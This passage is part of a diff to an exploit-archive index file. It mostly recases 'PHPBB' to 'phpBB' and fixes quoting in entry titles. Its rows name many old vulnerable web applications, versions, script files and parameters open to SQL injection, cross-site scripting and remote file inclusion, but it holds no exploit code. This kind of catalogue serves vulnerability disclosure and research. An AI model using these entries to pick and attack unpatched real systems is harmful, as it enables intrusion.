Gonzalez",linux,dos,0 -27857,platforms/php/webapps/27857.txt,"PHPBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 +27857,platforms/php/webapps/27857.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter SQL Injection",2006-05-11,sn4k3.23,php,webapps,0 27773,platforms/php/webapps/27773.txt,"CBHotel Hotel Software and Booking system 1.8 - Multiple Vulnerabilities",2013-08-22,"Dylan Irzi",php,webapps,0 27774,platforms/hardware/webapps/27774.py,"Netgear ProSafe - Information Disclosure",2013-08-22,"Juan J. Guelfo",hardware,webapps,0 27775,platforms/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",hardware,dos,0 @@ -24884,7 +24886,7 @@ id,file,description,date,author,platform,type,port 27783,platforms/php/webapps/27783.txt,"W-Agora 4.2 - BBCode Script Injection",2006-04-29,r0xes,php,webapps,0 27784,platforms/php/webapps/27784.txt,"PlanetGallery - Gallery_admin.php Authentication Bypass",2006-04-29,tugr@,php,webapps,0 27785,platforms/php/webapps/27785.txt,"DMCounter 0.9.2 -b - Kopf.php Remote File Inclusion",2006-05-01,beford,php,webapps,0 -27786,platforms/php/webapps/27786.txt,"PHPBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 +27786,platforms/php/webapps/27786.txt,"phpBB Knowledge Base 2.0.2 - Mod KB_constants.php Remote File Inclusion",2006-05-01,[Oo],php,webapps,0 27787,platforms/php/webapps/27787.txt,"MaxTrade 1.0.1 - Multiple SQL Injections",2006-05-01,r0t,php,webapps,0 27788,platforms/php/webapps/27788.txt,"OrbitHYIP 2.0 - signup.php referral Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 27789,platforms/php/webapps/27789.txt,"OrbitHYIP 2.0 - members.php id Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 @@ -24892,7 +24894,7 @@ id,file,description,date,author,platform,type,port 27791,platforms/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,linux,dos,0 27792,platforms/php/webapps/27792.txt,"SunShop Shopping Cart 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-05-01,r0t,php,webapps,0 27793,platforms/php/webapps/27793.txt,"Collaborative Portal Server 3.4 - POS Parameter Cross-Site Scripting",2006-05-01,r0t,php,webapps,0 -27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - login.php Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 +27794,platforms/php/webapps/27794.txt,"JSBoard 2.0.10/2.0.11 - 'login.php' Cross-Site Scripting",2006-05-02,"Alexander Klink",php,webapps,0 27795,platforms/php/webapps/27795.txt,"ZenPhoto 0.9/1.0 - i.php a Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 27796,platforms/php/webapps/27796.txt,"ZenPhoto 0.9/1.0 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-05-02,zone14,php,webapps,0 27797,platforms/php/webapps/27797.txt,"XDT Pro 2.3 - stats.php Cross-Site Scripting",2006-05-02,almaster,php,webapps,0 @@ -24910,9 +24912,9 @@ id,file,description,date,author,platform,type,port 27810,platforms/php/webapps/27810.txt,"Albinator 2.0.8 - dlisting.php cid Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27811,platforms/php/webapps/27811.txt,"Albinator 2.0.8 - showpic.php preloadSlideShow Parameter Cross-Site Scripting",2006-05-02,r0t,php,webapps,0 27812,platforms/php/webapps/27812.txt,"PHP Linkliste 1.0 - Linkliste.php Multiple Cross-Site Scripting Vulnerabilities",2006-05-03,d4igoro,php,webapps,0 -27813,platforms/asp/webapps/27813.txt,"CyberBuild - login.asp SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 +27813,platforms/asp/webapps/27813.txt,"CyberBuild - 'login.asp' SessionID Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 27814,platforms/asp/webapps/27814.txt,"CyberBuild - browse0.htm ProductIndex Parameter SQL Injection",2006-05-03,r0t,asp,webapps,0 -27815,platforms/asp/webapps/27815.txt,"CyberBuild - login.asp SessionID Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 +27815,platforms/asp/webapps/27815.txt,"CyberBuild - 'login.asp' SessionID Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27816,platforms/asp/webapps/27816.txt,"CyberBuild - browse0.htm ProductIndex Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27817,platforms/asp/webapps/27817.txt,"CyberBuild - result.asp Multiple Parameter Cross-Site Scripting",2006-05-03,r0t,asp,webapps,0 27818,platforms/php/webapps/27818.txt,"Invision Power Board 2.0/2.1 - 'index.php' SQL Injection",2006-05-04,almaster,php,webapps,0 @@ -24952,12 +24954,12 @@ id,file,description,date,author,platform,type,port 27852,platforms/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage",2006-05-10,"Bernhard Mueller",multiple,remote,0 27853,platforms/cfm/webapps/27853.txt,"Cartweaver 2.16.11 - Results.cfm category Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 27854,platforms/cfm/webapps/27854.txt,"Cartweaver 2.16.11 - Details.cfm ProdID Parameter SQL Injection",2006-04-25,r0t,cfm,webapps,0 -27858,platforms/php/webapps/27858.txt,"PHPBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 +27858,platforms/php/webapps/27858.txt,"phpBB Chart Mod 1.1 - charts.php id Parameter Cross-Site Scripting",2006-05-11,sn4k3.23,php,webapps,0 27859,platforms/php/webapps/27859.txt,"OZJournals 1.2 - Vname Parameter Cross-Site Scripting",2006-05-12,Kiki,php,webapps,0 27860,platforms/php/webapps/27860.txt,"PHP Live Helper 2.0 - chat.php Cross-Site Scripting",2006-05-12,Mr-X,php,webapps,0 27861,platforms/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/Navigation.asp sDeviceView Parameter Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 27862,platforms/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - NmConsole/ToolResults.asp sHostname Parameter Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote,0 -27863,platforms/php/webapps/27863.txt,"PHPBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 +27863,platforms/php/webapps/27863.txt,"phpBB 2.0.20 - Unauthorized HTTP Proxy",2006-05-12,rgod,php,webapps,0 27864,platforms/php/webapps/27864.txt,"Gphotos 1.4/1.5 - 'index.php' rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27865,platforms/php/webapps/27865.txt,"Gphotos 1.4/1.5 - diapo.php rep Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 27866,platforms/php/webapps/27866.txt,"Gphotos 1.4/1.5 - affich.php image Parameter Cross-Site Scripting",2006-05-13,"Morocco Security Team",php,webapps,0 @@ -25057,7 +25059,7 @@ id,file,description,date,author,platform,type,port 27958,platforms/php/webapps/27958.txt,"DeltaScripts PHP Pro Publish 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-02,Soot,php,webapps,0 27959,platforms/php/webapps/27959.txt,"PHP ManualMaker 1.0 - Multiple Input Validation Vulnerabilities",2006-06-02,Luny,php,webapps,0 27960,platforms/asp/webapps/27960.txt,"LocazoList Classifieds 1.0 - Viewmsg.asp SQL Injection",2006-06-02,ajann,asp,webapps,0 -27961,platforms/php/webapps/27961.txt,"PHPBB 2.0.x - template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 +27961,platforms/php/webapps/27961.txt,"phpBB 2.0.x - template.php Remote File Inclusion",2006-06-02,Canberx,php,webapps,0 27962,platforms/php/webapps/27962.txt,"IBWd GuestBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27963,platforms/php/webapps/27963.txt,"XUEBook 1.0 - 'index.php' SQL Injection",2006-06-03,SpC-x,php,webapps,0 27964,platforms/php/webapps/27964.txt,"CoolForum 0.x - editpost.php SQL Injection",2006-06-05,DarkFig,php,webapps,0 @@ -25101,8 +25103,8 @@ id,file,description,date,author,platform,type,port 28021,platforms/php/webapps/28021.txt,"Andy Mack 35mm Slide Gallery 6.0 - popup.php Multiple Parameter Cross-Site Scripting",2006-06-13,black-cod3,php,webapps,0 28022,platforms/php/webapps/28022.txt,"Woltlab Burning Board 2.x - Multiple SQL Injections",2006-06-14,"CrAzY CrAcKeR",php,webapps,0 28023,platforms/php/webapps/28023.txt,"Confixx 3.0/3.1 - FTP_index.php Cross-Site Scripting",2006-06-14,kr4ch,php,webapps,0 -28024,platforms/php/webapps/28024.txt,"PHPBB - BBRSS.php Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 -28025,platforms/php/webapps/28025.txt,"RahnemaCo - page.php Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0 +28024,platforms/php/webapps/28024.txt,"phpBB - BBRSS.php Remote File Inclusion",2006-06-14,SpC-x,php,webapps,0 +28025,platforms/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,php,webapps,0 28026,platforms/linux/dos/28026.txt,"MySQL Server 4/5 - Str_To_Date Remote Denial of Service",2006-06-14,Kanatoko,linux,dos,0 28027,platforms/php/webapps/28027.txt,"ISPConfig 2.2.3 - Multiple Remote File Inclusion",2006-06-14,"Federico Fazzi",php,webapps,0 28028,platforms/php/webapps/28028.txt,"vBulletin 2.x/3.x - Multiple Cross-Site Scripting Vulnerabilities",2006-06-15,Luny,php,webapps,0 @@ -25159,7 +25161,7 @@ id,file,description,date,author,platform,type,port 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 28099,platforms/windows/dos/28099.txt,"Yahoo! Messenger 7.0/7.5 - jscript.dll Non-Ascii Character Denial of Service",2006-06-23,"Ivan Ivan",windows,dos,0 -28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm'Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos,0 +28100,platforms/cfm/dos/28100.txt,"BlueDragon Server 6.2.1 - '.cfm' Denial of Service",2006-06-23,"Tan Chew Keong",cfm,dos,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28102,platforms/php/webapps/28102.txt,"Winged Gallery 1.0 - Thumb.php Cross-Site Scripting",2006-06-24,Luny,php,webapps,0 28103,platforms/windows/dos/28103.pl,"MailEnable 1.x - SMTP HELO Command Remote Denial of Service",2006-06-24,db0,windows,dos,0 @@ -25167,7 +25169,7 @@ id,file,description,date,author,platform,type,port 28105,platforms/php/webapps/28105.txt,"eNpaper1 - Root_Header.php Remote File Inclusion",2006-06-26,almaster,php,webapps,0 28106,platforms/php/webapps/28106.txt,"Bee-hive 1.2 - Multiple Remote File Inclusion",2006-06-16,Kw3[R]Ln,php,webapps,0 28107,platforms/php/webapps/28107.txt,"Cpanel 10 - Select.HTML Cross-Site Scripting",2006-06-26,preth00nker,php,webapps,0 -28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - login.php Cross-Site Scripting",2006-06-26,botan,php,webapps,0 +28108,platforms/php/webapps/28108.txt,"MyMail 1.0 - 'login.php' Cross-Site Scripting",2006-06-26,botan,php,webapps,0 28109,platforms/php/webapps/28109.txt,"Usenet 0.5 - 'index.php' Cross-Site Scripting",2006-06-23,Luny,php,webapps,0 28110,platforms/php/webapps/28110.txt,"MVNForum Activatemember 1.0 - Cross-Site Scripting",2006-06-26,r0t,php,webapps,0 28111,platforms/php/webapps/28111.txt,"OpenGuestbook 0.5 - header.php title Parameter Cross-Site Scripting",2006-06-26,simo64,php,webapps,0 @@ -25185,7 +25187,7 @@ id,file,description,date,author,platform,type,port 28123,platforms/php/webapps/28123.txt,"Pre Shopping Mall 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28124,platforms/php/webapps/28124.pl,"MKPortal 1.0.1 - 'index.php' Directory Traversal",2006-06-28,rUnViRuS,php,webapps,0 28125,platforms/php/webapps/28125.txt,"PHPClassifieds.Info - Multiple Input Validation Vulnerabilities",2006-06-28,Luny,php,webapps,0 -28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value parameter'SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 +28126,platforms/php/webapps/28126.rb,"Woltlab Burning Board FLVideo Addon - 'video.php value parameter' SQL Injection",2013-09-06,"Easy Laster",php,webapps,0 28129,platforms/php/webapps/28129.txt,"Practico CMS 13.7 - Authentication Bypass SQL Injection",2013-09-06,shiZheni,php,webapps,0 28130,platforms/windows/local/28130.rb,"IKE and AuthIP IPsec Keyring Modules Service (IKEEXT) - Missing DLL",2013-09-06,Metasploit,windows,local,0 28131,platforms/php/webapps/28131.txt,"PHP ICalender 2.22 - 'index.php' Cross-Site Scripting",2006-06-29,"Kurdish Security",php,webapps,0 @@ -25255,7 +25257,7 @@ id,file,description,date,author,platform,type,port 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6.0 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6.0 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0 28198,platforms/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote,0 -28199,platforms/php/webapps/28199.txt,"PHPBB 1.2.4 For Mambo - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 +28199,platforms/php/webapps/28199.txt,"phpBB 1.2.4 For Mambo - Multiple Remote File Inclusion",2006-07-09,h4ntu,php,webapps,0 28200,platforms/php/webapps/28200.txt,"Farsinews 3.0 - Tiny_mce_gzip.php Directory Traversal",2006-07-10,armin390,php,webapps,0 28201,platforms/php/webapps/28201.txt,"Graffiti Forums 1.0 - Topics.php SQL Injection",2006-07-10,Paisterist,php,webapps,0 28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6.0 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0 @@ -25333,8 +25335,8 @@ id,file,description,date,author,platform,type,port 28278,platforms/jsp/webapps/28278.txt,"OpenCMS 6.0/6.2 - Multiple Unauthorized Access Vulnerabilities",2006-07-26,"Meder Kydyraliev",jsp,webapps,0 28279,platforms/hardware/webapps/28279.txt,"Router ONO Hitron CDE-30364 - Cross-Site Request Forgery",2013-09-14,"Matias Mingorance Svensson",hardware,webapps,0 28280,platforms/php/webapps/28280.txt,"wwwThreads - calendar.php Cross-Site Scripting",2006-07-26,l2odon,php,webapps,0 -28281,platforms/php/webapps/28281.txt,"PHPbb-auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 -28282,platforms/php/webapps/28282.txt,"PHPbb-auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 +28281,platforms/php/webapps/28281.txt,"phpBB-auction 1.x - auction_room.php ar Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 +28282,platforms/php/webapps/28282.txt,"phpBB-auction 1.x - auction_store.php u Parameter SQL Injection",2006-07-26,l2odon,php,webapps,0 28283,platforms/hardware/webapps/28283.txt,"ZYXEL Prestige 660H-61 ADSL Router - RPSysAdmin.HTML Cross-Site Scripting",2006-07-27,jose.palanco,hardware,webapps,0 28284,platforms/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control (IcoLaunch) File Execution",2013-09-15,blake,windows,remote,0 28286,platforms/windows/dos/28286.txt,"Microsoft Internet Explorer 6.0 - NDFXArtEffects Stack Overflow",2006-07-27,hdm,windows,dos,0 @@ -25523,7 +25525,7 @@ id,file,description,date,author,platform,type,port 28471,platforms/php/webapps/28471.txt,"ToendaCMS 0.x/1.0.x - Remote File Inclusion",2006-09-01,h4ck3riran,php,webapps,0 28472,platforms/php/webapps/28472.txt,"Papoo CMS 3.2 - IBrowser Remote File Inclusion",2006-09-01,Ironfist,php,webapps,0 28473,platforms/php/webapps/28473.txt,"Autentificator 2.01 - Aut_Verifica.Inc.php SQL Injection",2006-09-02,SirDarckCat,php,webapps,0 -28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 +28474,platforms/lin_x86/shellcode/28474.c,"Linux/x86 - Multi-Egghunter Shellcode",2013-09-23,"Ryan Fenno",lin_x86,shellcode,0 28480,platforms/windows/remote/28480.rb,"CA BrightStor ARCserve Tape Engine - 0x8A Buffer Overflow (2)",2013-09-23,Metasploit,windows,remote,6502 28481,platforms/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069)",2013-09-23,Metasploit,windows,remote,0 28482,platforms/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071)",2013-09-23,Metasploit,windows,remote,0 @@ -25601,7 +25603,7 @@ id,file,description,date,author,platform,type,port 28557,platforms/php/webapps/28557.txt,"X2CRM 3.4.1 - Multiple Vulnerabilities",2013-09-25,"High-Tech Bridge SA",php,webapps,80 28558,platforms/linux/webapps/28558.txt,"ZeroShell 'cgi-bin/kerbynet' - Local File Disclosure",2013-09-25,"Yann CAM",linux,webapps,0 28658,platforms/php/webapps/28658.txt,"MyPhotos 0.1.3b - 'index.php' Remote File Inclusion",2006-09-23,Root3r_H3ll,php,webapps,0 -28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - login.php Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps,0 +28659,platforms/palm_os/webapps/28659.txt,"Jamroom 3.0.16 - 'login.php' Cross-Site Scripting",2006-09-24,meto5757,palm_os,webapps,0 28660,platforms/php/webapps/28660.php,"CPanel 5-10 - SUID Wrapper Privilege Escalation",2006-09-24,"Nima Salehi",php,webapps,0 28560,platforms/php/webapps/28560.txt,"Piwigo 2.5.2 - Cross-Site Scripting",2013-09-26,Arsan,php,webapps,0 28561,platforms/multiple/dos/28561.pl,"Blast XPlayer - Local Buffer Overflow (PoC)",2013-09-26,flux77,multiple,dos,0 @@ -25617,7 +25619,7 @@ id,file,description,date,author,platform,type,port 28570,platforms/cgi/webapps/28570.txt,"Mailman 2.1.x - Multiple Input Validation Vulnerabilities",2006-09-14,"Moritz Naumann",cgi,webapps,0 28571,platforms/php/webapps/28571.txt,"DCP-Portal 6.0 - admin/inc/footer.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 28572,platforms/php/webapps/28572.txt,"DCP-Portal 6.0 - admin/inc/header.inc.php Multiple Parameter Cross-Site Scripting",2006-09-14,"HACKERS PAL",php,webapps,0 -28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - login.php username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 +28573,platforms/php/webapps/28573.txt,"DCP-Portal 6.0 - 'login.php' username Parameter SQL Injection",2006-09-14,"HACKERS PAL",php,webapps,0 28574,platforms/php/webapps/28574.txt,"Blojsom 2.31 - Cross-Site Scripting",2006-09-14,"Avinash Shenoi",php,webapps,0 28575,platforms/php/webapps/28575.txt,"PhotoPost Pro 4.6 - Multiple Remote File Inclusion",2006-09-14,"Saudi Hackrz",php,webapps,0 28576,platforms/osx/local/28576.txt,"Apple Mac OSX 10.x - KExtLoad Format String",2006-09-14,"Adriel T. Desautels",osx,local,0 @@ -25743,7 +25745,7 @@ id,file,description,date,author,platform,type,port 28702,platforms/php/webapps/28702.txt,"CubeCart 3.0.x - /admin/image.php image Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28703,platforms/php/webapps/28703.txt,"CubeCart 3.0.x - /admin/header.inc.php Multiple Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 28704,platforms/php/webapps/28704.txt,"CubeCart 3.0.x - /footer.inc.php la_pow_by Parameter Cross-Site Scripting",2006-09-26,"HACKERS PAL",php,webapps,0 -28729,platforms/php/webapps/28729.txt,"PhpBB XS 0.58 - Multiple Remote File Inclusion",2006-09-30,xoron,php,webapps,0 +28729,platforms/php/webapps/28729.txt,"phpBB XS 0.58 - Multiple Remote File Inclusion",2006-09-30,xoron,php,webapps,0 28730,platforms/php/webapps/28730.txt,"OlateDownload 3.4 - details.php page Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 28727,platforms/php/webapps/28727.txt,"Les Visiteurs 2.0 - Multiple Remote File Inclusion",2006-09-28,D_7J,php,webapps,0 28731,platforms/php/webapps/28731.txt,"OlateDownload 3.4 - search.php query Parameter SQL Injection",2006-09-29,Hessam-x,php,webapps,0 @@ -25799,14 +25801,14 @@ id,file,description,date,author,platform,type,port 28764,platforms/windows/local/28764.c,"Symantec AntiVirus - IOCTL Kernel Privilege Escalation (2)",2006-08-26,"Ruben Santamarta ",windows,local,0 28765,platforms/windows/remote/28765.c,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (1)",2006-10-05,LSsec.com,windows,remote,0 28766,platforms/windows/remote/28766.py,"Computer Associates Products Message Engine RPC Server - Multiple Buffer Overflow Vulnerabilities (2)",2006-10-05,LSsec.com,windows,remote,0 -28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - login.php Multiple SQL Injection",2006-10-06,"Francesco Laurita",php,webapps,0 +28767,platforms/php/webapps/28767.txt,"AckerTodo 4.2 - 'login.php' Multiple SQL Injection",2006-10-06,"Francesco Laurita",php,webapps,0 28768,platforms/asp/webapps/28768.html,"Emek Portal 2.1 - Uyegiris.asp SQL Injection",2006-10-06,"Dj ReMix",asp,webapps,0 28769,platforms/php/webapps/28769.txt,"Interspire FastFind - 'index.php' Cross-Site Scripting",2006-09-27,MizoZ,php,webapps,0 28770,platforms/php/webapps/28770.txt,"Moodle Blog 1.18.2.2/1.6.2 Module - SQL Injection",2006-10-08,disfigure,php,webapps,0 28771,platforms/php/webapps/28771.pl,"PHP Polling Creator 1.03 - Functions.inc.php Remote File Inclusion",2006-10-08,ThE-WoLf-KsA,php,webapps,0 28772,platforms/php/webapps/28772.txt,"ISearch 2.16 - ISEARCH_PATH Parameter Remote File Inclusion",2006-10-09,MoHaNdKo,php,webapps,0 28773,platforms/php/webapps/28773.txt,"Deep CMS 2.0 - 'index.php' Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 -28774,platforms/php/webapps/28774.txt,"PHPWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 +28774,platforms/php/webapps/28774.txt,"phpWebSite 0.10.2 - PHPWS_SOURemote Code Execution_DIR Parameter Multiple Remote File Inclusion",2006-10-09,Crackers_Child,php,webapps,0 28775,platforms/linux/dos/28775.pl,"ZABBIX 1.1.2 - Multiple Unspecified Remote Code Execution Vulnerabilities",2006-10-09,"Max Vozeler",linux,dos,0 28776,platforms/php/webapps/28776.txt,"EXPBlog 0.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-10-09,Tamriel,php,webapps,0 28777,platforms/php/webapps/28777.txt,"Hastymail 1.x - IMAP SMTP Command Injection",2006-10-10,"Vicente Aguilera Diaz",php,webapps,0 @@ -25836,8 +25838,8 @@ id,file,description,date,author,platform,type,port 28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0 28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0 -28804,platforms/php/webapps/28804.pl,"PHPBB Add Name Module - Not_Mem.php Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 -30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico'Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 +28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - Not_Mem.php Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0 +30208,platforms/windows/dos/30208.txt,"IcoFX 2.5.0.0 - '.ico' Buffer Overflow",2013-12-11,"Core Security",windows,dos,0 29213,platforms/windows/local/29213.pl,"Photodex ProShow Producer 5.0.3310 - Local Buffer Overflow (SEH)",2013-10-26,"Mike Czumak",windows,local,0 28806,platforms/linux/local/28806.txt,"davfs2 1.4.6/1.4.7 - Privilege Escalation",2013-10-08,"Lorenzo Cantoni",linux,local,0 28807,platforms/php/webapps/28807.py,"WHMCS 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0 @@ -25910,7 +25912,7 @@ id,file,description,date,author,platform,type,port 28875,platforms/php/webapps/28875.txt,"Freenews 1.1 - Aff_News.php Remote File Inclusion",2006-10-30,MoHaNdKo,php,webapps,0 28876,platforms/windows/remote/28876.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution (1)",2006-10-30,"Michal Bucko",windows,remote,0 28877,platforms/windows/remote/28877.htm,"Microsoft Internet Explorer 6.0 - Unspecified Code Execution (2)",2006-10-30,"Michal Bucko",windows,remote,0 -28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - login.php username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 +28878,platforms/asp/webapps/28878.txt,"Evandor Easy notesManager 0.0.1 - 'login.php' username Parameter SQL Injection",2006-10-30,poplix,asp,webapps,0 28879,platforms/asp/webapps/28879.txt,"Evandor Easy notesManager 0.0.1 - Search Page SQL Injection",2006-10-30,poplix,asp,webapps,0 28880,platforms/windows/dos/28880.txt,"Microsoft Internet Explorer 6.0/7.0 - RemoveChild Denial of Service",2006-10-30,"Wojciech H",windows,dos,0 28881,platforms/php/webapps/28881.txt,"Foresite CMS - Index_2.php Cross-Site Scripting",2006-10-30,"David Vieira-Kurz",php,webapps,0 @@ -25949,27 +25951,28 @@ id,file,description,date,author,platform,type,port 28915,platforms/php/webapps/28915.txt,"Article Script 1.6.3 - rss.php SQL Injection",2006-11-06,Liz0ziM,php,webapps,0 28916,platforms/windows/remote/28916.rb,"America Online ICQ 5.1 - ActiveX Control Remote Code Execution",2006-11-06,"Peter Vreugdenhil",windows,remote,0 28912,platforms/linux/dos/28912.txt,"Linux Kernel 2.6.x - 'ISO9660' Denial of Service",2006-11-05,LMH,linux,dos,0 -28917,platforms/php/webapps/28917.txt,"AIOCP 1.3.x - cp_forum_view.php Multiple Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28918,platforms/php/webapps/28918.txt,"AIOCP 1.3.x - cp_dpage.php choosed_language Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28919,platforms/php/webapps/28919.txt,"AIOCP 1.3.x - cp_show_ec_products.php order_field Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28920,platforms/php/webapps/28920.txt,"AIOCP 1.3.x - cp_users_online.php order_field Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28921,platforms/php/webapps/28921.txt,"AIOCP 1.3.x - cp_links_search.php orderdir Parameter Cross-Site Scripting",2006-11-06,"laurent gaffie",php,webapps,0 -28922,platforms/php/webapps/28922.txt,"AIOCP 1.3.x - /admin/code/index.php load_page Parameter Remote File Inclusion",2006-11-06,"laurent gaffie",php,webapps,0 -28923,platforms/php/webapps/28923.txt,"AIOCP 1.3.x - cp_dpage.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28924,platforms/php/webapps/28924.txt,"AIOCP 1.3.x - cp_news.php Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28925,platforms/php/webapps/28925.txt,"AIOCP 1.3.x - cp_forum_view.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28926,platforms/php/webapps/28926.txt,"AIOCP 1.3.x - cp_edit_user.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28927,platforms/php/webapps/28927.txt,"AIOCP 1.3.x - cp_newsletter.php Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28928,platforms/php/webapps/28928.txt,"AIOCP 1.3.x - cp_links.php Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28929,platforms/php/webapps/28929.txt,"AIOCP 1.3.x - cp_contact_us.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28930,platforms/php/webapps/28930.txt,"AIOCP 1.3.x - cp_show_ec_products.php Multiple Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28931,platforms/php/webapps/28931.txt,"AIOCP 1.3.x - cp_login.php choosed_language Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 -28932,platforms/php/webapps/28932.txt,"AIOCP 1.3.x - cp_users_online.php order_field Parameter SQL Injection",2006-11-06,"laurent gaffie",php,webapps,0 